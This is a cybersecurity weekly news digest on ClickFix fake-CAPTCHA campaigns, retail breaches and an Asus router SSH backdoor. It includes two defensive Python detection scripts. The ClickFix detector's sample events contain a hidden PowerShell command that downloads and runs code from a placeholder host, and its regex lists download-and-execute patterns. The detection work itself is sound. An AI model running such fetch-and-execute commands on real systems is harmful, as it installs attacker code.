Each week I spend hours going through 20+ different cybersecurity news sources to find and summarise the most interesting news of the week, so you can quickly catch up on only the stories that matter.
This week's keyword is definitely "CAPTCHA gate": a fake CAPTCHA that tricks the user into running a command themselves (also known as ClickFix). It is a technique that is gaining a lot of momentum and dominating the news.
Also, if you are at all involved in information security in the retail space, you need to be alert: the attack wave that originally started in the UK with Co-op and Marks & Spencer has reached the U.S. and continues unabated.
1. Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Globally
CFOs are receiving convincing fake recruitment emails from "Rothschild & Co." offering strategic career opportunities, but clicking the supposed PDF attachment leads to a clever trap: a custom CAPTCHA puzzle that, once solved, secretly downloads and installs the legitimate NetBird remote access tool as a backdoor. The sophisticated campaign targets financial executives globally and has been active for nearly a year.
Key Details
- Targets banks, energy companies, insurers, and investment firms across Europe, Africa, Canada, Middle East, and South Asia
- Part of a growing trend of threat actors abusing legitimate remote access tools such as ConnectWise ScreenConnect and Atera to evade detection
Next steps
- Audit and allowlist remote access tools: NetBird, like the other tools abused in this trend, is legitimate signed software that signature-based antivirus will not flag, so control it by policy. Inventory the remote access tools you actually use and implement application allowlisting so that nothing else can be installed or run
- Warn executives in your organisation: recruiter-themed lures and a CAPTCHA prompt inside a supposed PDF are the tells of this campaign
Read more: The Hacker News – Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
2. Microsoft and CrowdStrike Launch Shared Threat Actor Glossary to Cut Attribution Confusion
Security teams are drowning in a sea of threat actor nicknames: the same Russian group might be called APT29, Cozy Bear, Midnight Blizzard, or any of a dozen other names depending on which vendor's report you're reading. Microsoft and CrowdStrike have launched a joint cross-reference mapping that works like a "Rosetta Stone," showing which vendor names refer to the same threat actor without forcing anyone to change their existing naming system.
Key Details
- The initiative has already mapped over 80 threat actors, confirming matches like Microsoft’s “Volt Typhoon” = CrowdStrike’s “VANGUARD PANDA” and “Secret Blizzard” = “VENOMOUS BEAR”
- Rather than creating a unified naming standard, the project preserves each vendor’s existing taxonomy while providing translation between systems
- Google/Mandiant and Palo Alto Networks are joining the effort, with plans to expand to other cybersecurity vendors
- The mapping is available through Microsoft’s documentation, downloadable files, and programmatic APIs for automated lookups
Next Steps
- See the mapping here: https://learn.microsoft.com/en-us/unified-secops-platform/microsoft-threat-actor-naming
Read more: The Hacker News | SecurityWeek | Microsoft Threat Actor Mapping Resource
3. Fake DocuSign, Gitcode Sites Spread NetSupport RAT using Clipboard poisoning
Users visiting fake DocuSign and Gitcode websites are being tricked into "proving they're not a robot" by completing CAPTCHA challenges that secretly copy malicious PowerShell commands to their clipboard. When victims follow the instructions to paste and run the command (Win+R, Ctrl+V, Enter), they unknowingly trigger a multi-stage infection chain that ultimately installs NetSupport RAT on their systems.
Key Details
- The attack uses “clipboard poisoning” where fake CAPTCHA verification secretly copies obfuscated PowerShell scripts to victims’ clipboards
- Multi-stage infection downloads intermediate scripts from external servers, establishes persistence via GitHub-hosted payloads, and deploys the final NetSupport RAT
- NetSupport Manager is a legitimate remote administration tool frequently abused by threat groups including FIN7, Scarlet Goldfinch, and Storm-0408
Next Steps
- Detect Run-dialog execution: clipboard writes are rarely logged by EDR, so key on what the paste produces instead. A command run from Win+R starts as a child of explorer.exe, so alert on explorer.exe spawning powershell.exe, mshta.exe or cmd.exe with a hidden-window, encoded or download-and-execute command line, and on new entries under the Run dialog's history key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU)
- Block legitimate tools used maliciously: Audit and restrict NetSupport Manager installations to authorized use cases only
- Update CAPTCHA awareness: Include fake CAPTCHA clipboard poisoning techniques in security awareness training as this is a newer attack vector
Read more: The Hacker News – Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack
4. ClickFix Email Scam Alert: Fake Booking.com Emails Deliver Malware using Clipboard poisoning
Hotel employees are receiving what looks like legitimate Booking.com emails with broken CAPTCHA verifications that need to be "fixed." When victims click to solve the fake CAPTCHA, malicious PowerShell commands are secretly copied to their clipboard, and they're instructed to press Win+R, Ctrl+V, Enter—unknowingly executing malware that installs remote access trojans like XWorm RAT.
Key Details
- Campaign surged dramatically with 47% of total volume occurring in March 2025, specifically targeting food and accommodation sector businesses
Next Steps
- Monitor Win+R executions: the Run dialog launches the pasted command as a child process of explorer.exe, so endpoint detection for explorer.exe spawning PowerShell or mshta with a suspicious command line catches this regardless of how the command reached the clipboard
- Educate on fake CAPTCHA mechanics: Train users that legitimate CAPTCHAs never require copying/pasting commands or using keyboard shortcuts
Read more: HackRead – ClickFix Email Scam Alert: Fake Booking.com Emails Deliver Malware
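Both ClickFix stories above (items 3 and 4) come down to the same observable: a user pastes an attacker-supplied command into the Run dialog and presses Enter. The following is an added example, not code from the articles or from either campaign, of how that can be flagged in Sysmon-style endpoint telemetry. The events are constructed (simplified Sysmon Event ID 1 process-creation and Event ID 13 registry-value-set records; the field names follow Sysmon, the values are made up), and the command-line fragments in PAYLOAD_RE are my assumptions about what typical payloads look like, to be tuned for your environment.

```python
"""Detect ClickFix-style Run-dialog executions in Sysmon-style telemetry."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Script hosts a pasted ClickFix command is usually handed to.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line fragments typical of download-and-run payloads (assumed; tune per environment).
PAYLOAD_RE = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|"
    r"downloadstring|invoke-webrequest|\biwr\b|mshta\s+https?://|frombase64string",
    re.IGNORECASE,
)
# Run-dialog history lives in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU,
# one single-letter value per command (plus an MRUList value, which this pattern skips).
RUNMRU_RE = re.compile(r"\\Explorer\\RunMRU\\[a-z]$", re.IGNORECASE)


@dataclass
class Finding:
    severity: str   # "high" or "medium"
    reason: str
    event: dict


def basename(path: str) -> str:
    """Last path component, lower-cased, for both backslash and slash separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[Finding]:
    """Return a Finding for one event, or None if it does not look like ClickFix."""
    if event.get("EventID") == 1:  # process creation
        parent = basename(event.get("ParentImage", ""))
        child = basename(event.get("Image", ""))
        if parent == "explorer.exe" and child in SCRIPT_HOSTS:
            if PAYLOAD_RE.search(event.get("CommandLine", "")):
                return Finding("high", "explorer.exe launched a script host with a download/run command line", event)
            # A console the user opened by hand looks the same, so this alone is only medium.
            return Finding("medium", "explorer.exe launched a script host (Run dialog or shortcut)", event)
    elif event.get("EventID") == 13:  # registry value set
        if RUNMRU_RE.search(event.get("TargetObject", "")) and PAYLOAD_RE.search(event.get("Details", "")):
            return Finding("high", "Run-dialog history (RunMRU) recorded a download/run command", event)
    return None


def scan(events: Iterable[dict]) -> List[Finding]:
    """Classify every event and keep the ones that produced a finding."""
    return [f for f in map(classify, events) if f is not None]


# Constructed sample events (simplified Sysmon fields; values are made up).
PASTED = 'powershell -w hidden -c "iex (iwr http://example.invalid/c)"'
SAMPLE_EVENTS = [
    {"EventID": 1, "User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": PASTED},
    {"EventID": 13, "User": "CORP\\jdoe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": PASTED + "\\1"},
    {"EventID": 1, "User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 1, "User": "CORP\\admin", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"EventID": 1, "User": "CORP\\svc", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "powershell -enc AAAA"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.reason} user={f.event.get('User')}")
```

On the sample the first two events are flagged high (the Run-dialog launch and the matching RunMRU write), the bare cmd.exe from explorer.exe is medium, notepad is ignored, and the encoded PowerShell spawned by cmd.exe is left alone because it is a different lineage than the one ClickFix produces. The RunMRU signal is worth keeping even if you already have process telemetry: it survives on disk and is what you will pull from an image when the live events are gone.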
5. Compliance Firm Vanta Leaks Customer Data to Other Clients
Companies using Vanta for security compliance suddenly found other organizations' sensitive employee data mixed into their own dashboards due to a product code change gone wrong. The irony is stark: a company trusted to help hundreds of businesses manage their security compliance accidentally exposed customer data to competitors through an internal software bug.
Key Details
- Incident was caused by a recent product code change affecting third-party integrations, not an external attack or credential compromise
- The bug, discovered May 26, affected fewer than 4% of customers, which still amounts to hundreds of organisations and their sensitive compliance data
- Exposed data included employee names, account configurations, MFA usage details, and third-party integration settings – all visible to other Vanta customers.
- Vanta committed to complete remediation by June 4 and is updating their integration APIs and access control testing
Next Steps
- Assess SaaS multi-tenancy risks: ask your SaaS vendors how they enforce tenant isolation and how they test it after code changes, and weigh what a cross-tenant leak of the data you give them would mean for you
Read more: HackRead – Code Bug at Compliance Firm Vanta Leaks Customer Data to Other Clients
6. Crocodilus Malware Adds Fake Entries To Victims’ Contact Lists In New Scam Campaign
Android users across Europe, South America and Asia are discovering fake bank support numbers mysteriously appearing in their contact lists, courtesy of the Crocodilus banking trojan. When victims call these numbers thinking they're reaching their real bank, they're actually speaking to scammers who can bypass fraud detection systems that typically flag calls from unknown numbers.
Key Details
- Malware spreads via Facebook ads that stay online only 1-2 hours but get 1,000+ views each, primarily targeting users over 35 for maximum financial impact
- Campaign uses region-specific lures: Polish bank/shopping app mimics, Turkish online casino overlays, Spanish browser updates, and Brazilian banking trojans
- Can bypass Android 13+ security restrictions for app installations and overlays real financial apps with fake login screens
- Geographic expansion and technical sophistication suggest involvement of well-resourced, organized threat actors
Next Steps
- Educate on contact verification: Train users to verify bank contact numbers through official websites rather than trusting stored contacts
Read more: The Record – Crocodilus malware adds fake entries to victims’ contact lists in new scam campaign
7. Malaysian home minister’s WhatsApp hacked, used to scam contacts
Malaysia's home affairs minister, the country's top security official who oversees law enforcement and immigration, discovered his WhatsApp account had been hijacked by attackers who used it to send malicious links to his entire contact list. The embarrassing breach sparked public ridicule and questions about Malaysia's cybersecurity capabilities, given that even the country's chief security minister couldn't protect his own messaging app.
Key Details
- Attackers used a VPN to compromise Datuk Seri Saifuddin Nasution Ismail’s account and sent malicious links targeting financial and personal information
- Part of escalating pattern: parliamentary speaker targeted in March, former PM’s Telegram/Signal accounts compromised in 2022, police social media hijacked in 2015
- Mobile phishing has become increasingly common in Malaysia with citizens frequently targeted by fraudsters posing as police, bank officials, or court representatives
Next Steps
- Executive protection awareness: provide specialised training on mobile security and social engineering tactics, especially for executive teams, and make sure their messaging accounts have a PIN/two-step verification enabled
Read more: The Record – Malaysian home minister’s WhatsApp hacked, used to scam contacts
8. Security News This Week: A Hacker May Have Deepfaked Trump’s Chief of Staff in a Phishing Campaign
The FBI is investigating a sophisticated attack where someone impersonated Susie Wiles, Trump's chief of staff, using both text messages and AI-generated voice calls that may represent one of the first significant deepfake phishing campaigns. The attackers accessed Wiles' contact list to target high-profile Republican figures and business executives, with some calls attempting financial fraud while others sought political intelligence like pardon lists.
Key Details
- The FBI does not believe a foreign nation was involved, pointing to cybercriminal fraud rather than espionage, despite the target being the president's closest adviser
- Uncertainty remains over how attackers obtained Wiles’ contacts – could be device compromise or public/gray-market data aggregation
Next Steps
- Implement out-of-band verification: establish an independent way to authenticate sensitive requests (a call back on a known number, or a pre-agreed code word), since a familiar voice is no longer proof of identity
Read more: WIRED – Security News This Week: A Hacker May Have Deepfaked Trump’s Chief of Staff in a Phishing Campaign
9. Retail Cyberattack Wave Escalates with Three Major Breaches This Week
Security teams across the retail sector are reeling from three significant cyberattacks this week alone, as Cartier, Victoria's Secret, and North Face all disclosed breaches affecting thousands of customers. The incidents represent an escalation of the coordinated campaign that began with UK retailers in April and has now spread globally, with attackers targeting everything from luxury jewelers to outdoor gear companies using sophisticated social engineering tactics.
Key Details
- Cartier disclosed that hackers accessed internal systems and stole customer names, email addresses, and countries of residence, though no financial data was compromised
- Victoria’s Secret proactively shut down its entire U.S. website and curtailed in-store functions during Memorial Day weekend, with the incident affecting internal systems including email servers, HR functions, and potentially payroll processes
- North Face revealed that 2,861 customer accounts were compromised in a credential stuffing attack, with attackers using passwords stolen from other breaches to access purchase histories, addresses, and personal information
- These attacks continue the pattern that began with UK retailers Marks & Spencer, Co-op, and Harrods in April, attributed to the DragonForce ransomware group and Scattered Spider collective
Read More
Cartier Data Breach: Luxury Retailer Warns Customers – SecurityWeek
Victoria’s Secret takes website offline after security incident – AP News
Nearly 3,000 North Face website customer accounts breached – The Record
10. Cybercriminals Exploit Salesforce Data Loader in New Social Engineering Campaign
IT teams are being tricked into approving malicious versions of Salesforce's Data Loader tool during sophisticated phone calls, giving attackers extensive access to steal sensitive customer data and move through corporate networks. Google warns that the campaign by "The Com" cybercriminal collective has targeted about 20 organizations across hospitality, retail, and education sectors, with some victims facing extortion demands months after the initial breach.
Key Details
- Fake IT support calls trick employees into installing malicious Salesforce apps that steal customer data
- Campaign linked to “The Com” collective behind MGM and Caesars casino attacks
- Extortion demands often come months after initial breach, suggesting partnership with other threat actors
Next Steps
- Verify caller identity through separate channels before approving any Salesforce app installations
- Audit existing Salesforce connected apps for unauthorised Data Loader versions
- Monitor for unusual large-scale data exports from Salesforce and other SaaS environments
Read More
Google warns of cybercriminals targeting Salesforce app to steal data – The Record
11. Meta and Yandex Caught Using Secret Tracking Method to Deanonymize Billions of Users
Researchers found that the Facebook and Instagram apps on Android have been secretly identifying users to websites they visit in their browsers, even when they are not logged into social media in that browser. When a user visits a site carrying a Meta tracking pixel, the pixel's JavaScript connects to the installed Facebook or Instagram app through a hidden "localhost socket", allowing Meta to link the supposedly anonymous browsing session to the real user profile. Yandex has used the same technique since 2017, Meta since September 2024.
Key Details
- JavaScript tracking scripts embedded on thousands of websites silently connect with native apps through localhost sockets to share user data
- Technique bypasses traditional privacy protections by linking browser cookies to Android Advertising IDs and app account identities
- Meta’s tracking script was reportedly disabled the morning after researchers published their findings
Read More
Meta and Yandex abused Internet protocols to covertly track billions of users – Ars Technica
12. Microsoft Launches Free AI-Powered Cybersecurity Program for European Governments
Microsoft launched a new European Security Program, an expansion of its existing Government Security Program (which has provided free cybersecurity services to over 40 countries since 2003), to offer enhanced AI-driven threat intelligence specifically for European governments. The program targets escalating attacks from Russia, China, Iran, and North Korea by providing real-time threat insights, early vulnerability warnings, and strengthened partnerships with Europol and other European security organisations to all 27 EU countries plus the UK, EFTA members, and several other European nations.
Key Details
- The existing Government Security Program serves national security agencies and cyber emergency response teams from over 40 countries with more than 100 participating agencies
- Governments access the program through local Microsoft representatives after meeting eligibility criteria focused on intellectual property protections and national security responsibilities
- New European enhancements include embedded Microsoft investigators at Europol headquarters and joint research programs with UK’s Laboratory for AI Security Research
Read More
Microsoft unveils free EU cybersecurity program for governments – BleepingComputer
13. 9,000 Asus Routers Compromised by Persistent SSH Backdoor That Survives Firmware Updates
Asus router owners discovered their devices had been compromised by the "AyySSHush" botnet through an attack that installs an SSH backdoor written to non-volatile memory (NVRAM), so it survives reboots and firmware updates. The malware-free attack chains authentication bypasses with a known command injection vulnerability to enable persistent administrative access via a hidden SSH listener on TCP port 53282.
Key Details
- Attackers disable system logging and AiProtection security features to evade detection while maintaining persistent access
- GreyNoise’s AI tool “Sift” detected the campaign using only 30 malicious requests over three months, demonstrating the attack’s stealth
- Asus released firmware patches that prevent new infections, but a firmware update does not remove an existing backdoor; only a factory reset does
Next Steps
- Check whether TCP port 53282 is accepting connections on the router, and review the SSH authorized keys configured on it for any entry you did not add yourself
- Perform factory resets on suspected compromised routers and reconfigure from scratch rather than relying on firmware updates
- Block known malicious IP addresses associated with the campaign and monitor for unusual outbound connections
Read More
9,000 Asus routers compromised by persistent SSH backdoor – Tom’s Hardware
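Two of the next steps above, the port check and the authorized keys review, scripted as an added example in Python (not code from GreyNoise, Asus or the article). The authorized_keys content, the "known" keys and the key blobs themselves are constructed for the demo and are not real key pairs; fingerprints are computed the way OpenSSH prints them (SHA-256 over the decoded key blob, base64 without padding), so you can paste the fingerprints that `ssh-keygen -lf` prints for your own keys into KNOWN_FINGERPRINTS. The TEST-NET address 192.0.2.1 in the usage section is a placeholder for your router's LAN address.

```python
"""Router SSH backdoor checks: open-port probe and authorized_keys review."""
import base64
import hashlib
import socket
import struct
from typing import Iterable, List

BACKDOOR_PORT = 53282  # port reported for the AyySSHush SSH backdoor


def probe_backdoor_port(host: str, port: int = BACKDOOR_PORT, timeout: float = 2.0) -> bool:
    """Return True if something accepts TCP connections on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable, or sockets not permitted
        return False


def ssh_fingerprint(b64_blob: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64-encoded public key blob."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def parse_authorized_keys(text: str) -> List[dict]:
    """Parse authorized_keys lines; options before the key type are preserved."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # Options such as from="10.0.0.0/24",no-pty may precede the key type.
        # (Quoted options containing spaces are not handled by this simple split.)
        idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(parts):
            entries.append({"line": lineno, "error": "unparseable", "raw": line})
            continue
        try:
            fingerprint = ssh_fingerprint(parts[idx + 1])
        except ValueError:  # binascii.Error is a ValueError
            entries.append({"line": lineno, "error": "bad base64", "raw": line})
            continue
        entries.append({
            "line": lineno,
            "type": parts[idx],
            "fingerprint": fingerprint,
            "comment": " ".join(parts[idx + 2:]),
            "options": " ".join(parts[:idx]),
        })
    return entries


def unknown_keys(text: str, known_fingerprints: Iterable[str]) -> List[dict]:
    """Entries whose fingerprint is not on the allowlist (unparseable lines included)."""
    known = set(known_fingerprints)
    return [e for e in parse_authorized_keys(text) if e.get("fingerprint") not in known]


def fake_blob(seed: int) -> str:
    """Constructed ssh-ed25519 blob in SSH wire format (length-prefixed fields); NOT a real key."""
    pub = hashlib.sha256(seed.to_bytes(4, "big")).digest()  # 32 stand-in bytes for the public key
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + pub
    return base64.b64encode(blob).decode()


ADMIN_KEY, BACKUP_KEY, ROGUE_KEY = (fake_blob(i) for i in (1, 2, 3))
SAMPLE_AUTHORIZED_KEYS = f"""# constructed sample of a router's authorized_keys
ssh-ed25519 {ADMIN_KEY} admin@laptop
from="10.0.0.0/24" ssh-ed25519 {BACKUP_KEY} backup@nas
ssh-ed25519 {ROGUE_KEY}
"""
# The allowlist you would maintain: fingerprints of the keys you know you installed.
KNOWN_FINGERPRINTS = {ssh_fingerprint(ADMIN_KEY), ssh_fingerprint(BACKUP_KEY)}

if __name__ == "__main__":
    for e in unknown_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_FINGERPRINTS):
        print(f"line {e['line']}: unknown {e.get('type')} key {e.get('fingerprint')} "
              f"comment={e.get('comment')!r}")
    router = "192.0.2.1"  # placeholder (TEST-NET); replace with your router's LAN address
    print(f"TCP {BACKDOOR_PORT} open on {router}:", probe_backdoor_port(router, timeout=1.0))
```

On the sample the third key, which has no comment and is not on the allowlist, is the one reported. Matching on fingerprints rather than on the raw key text means a re-formatted or re-commented entry still matches your allowlist, while an unparseable or malformed line is reported rather than silently skipped, since that is exactly where an injected entry might hide. Bear in mind the page's caveat: if the port is open or an unknown key is present, a firmware update will not clean it up; factory reset and reconfigure.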